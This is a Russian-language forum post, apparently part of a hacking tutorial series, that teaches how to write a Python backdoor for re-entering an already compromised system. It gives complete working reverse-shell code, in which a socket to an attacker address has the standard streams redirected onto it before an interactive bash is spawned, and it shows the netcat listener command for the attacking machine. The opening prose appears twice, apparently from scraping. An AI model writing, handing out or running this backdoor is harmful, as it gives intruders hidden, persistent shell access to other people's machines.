Всем привет, дорогие друзья! Наконец мы дожили до второй части. Заранее извиняюсь, если кого-то заставил ждать. Прошлая часть немного навела шороху, надеюсь и эта не отстанет.
[*Прошлая часть*]
В этой части мы постараемся написать backdoor. В его написании, я не вижу ничего сложного, но перед тем как начать его создавать, давайте разберемся с "задней дверью" подробнее!
Так почему же backdoor - черный ход? - спросите вы.
Потому, что его используют для повторного проникновения в уже взломанную систему! - отвечу вам, я)
Кстати, Shell - это консольная оболочка системы. К ней мы сегодня и постараемся получить доступ.
Существует 2 способа получения доступа к командной оболочке. Это reverse и bind.
Reverse Shell, кстати, используется в том случае, если соединение блокируется фаерволом. Как раз таки его мы с вами и опишем.
*Подробно про Reverse и Bind Shell читать тут)*
Что же, сегодня нам понадобятся 3 следующие библиотеки:
И так, подключаем данные модули:
Далее создаем сокет и осуществляем подключение:
А теперь не мало важная часть. Это - потоки ввода данных. Наша задача, привязать потоки данных к нашей серверной части.
И конечно же даем доступ к shell'у(командной оболочке):
В итоге получаем backdoor, который получает доступ по принципу Reverse Shell
Далее, на атакующей машине остается только запустить сервер. Это делается просто - netcat.
Пропишем следующую команду:
В итоге наблюдаем, что все сработало как нам надо)
А на этом все. Попробуйте написать свой сервер для атакующей машины.
[*Прошлая часть*]
[Введение]
В этой части мы постараемся написать backdoor. В его написании, я не вижу ничего сложного, но перед тем как начать его создавать, давайте разберемся с "задней дверью" подробнее!
Так почему же backdoor - черный ход? - спросите вы.
Потому, что его используют для повторного проникновения в уже взломанную систему! - отвечу вам, я)
Кстати, Shell - это консольная оболочка системы. К ней мы сегодня и постараемся получить доступ.
Существует 2 способа получения доступа к командной оболочке. Это reverse и bind.
Reverse Shell, кстати, используется в том случае, если соединение блокируется фаерволом. Как раз таки его мы с вами и опишем.
*Подробно про Reverse и Bind Shell читать тут)*
[Приступаем к делу]
Что же, сегодня нам понадобятся 3 следующие библиотеки:
- Socket
- Subprocess
- OS
И так, подключаем данные модули:
Python:
import subprocess
import socket
import osДалее создаем сокет и осуществляем подключение:
Python:
host = "имя сервера"
port = порт
sock = socket.socket()
sock.connect((host, port))А теперь не мало важная часть. Это - потоки ввода данных. Наша задача, привязать потоки данных к нашей серверной части.
Python:
os.dup2(sock.fileno(),0)
os.dup2(sock.fileno(),1)
os.dup2(sock.fileno(),2)И конечно же даем доступ к shell'у(командной оболочке):
Код:
subprocess.call(["bash","-i"])В итоге получаем backdoor, который получает доступ по принципу Reverse Shell
Python:
import subprocess
import socket
import os
host = 192.168.1.X # server name
port = 9191 #ясно дело порт )
sock = socket.socket()
sock.connect((host, port))
os.dup2(sock.fileno(),0)
os.dup2(sock.fileno(),1)
os.dup2(sock.fileno(),2)
subprocess.call(["bash", "-i"])Далее, на атакующей машине остается только запустить сервер. Это делается просто - netcat.
Пропишем следующую команду:
Код:
nc -nlvp <порт>В итоге наблюдаем, что все сработало как нам надо)
А на этом все. Попробуйте написать свой сервер для атакующей машины.
Последнее редактирование:
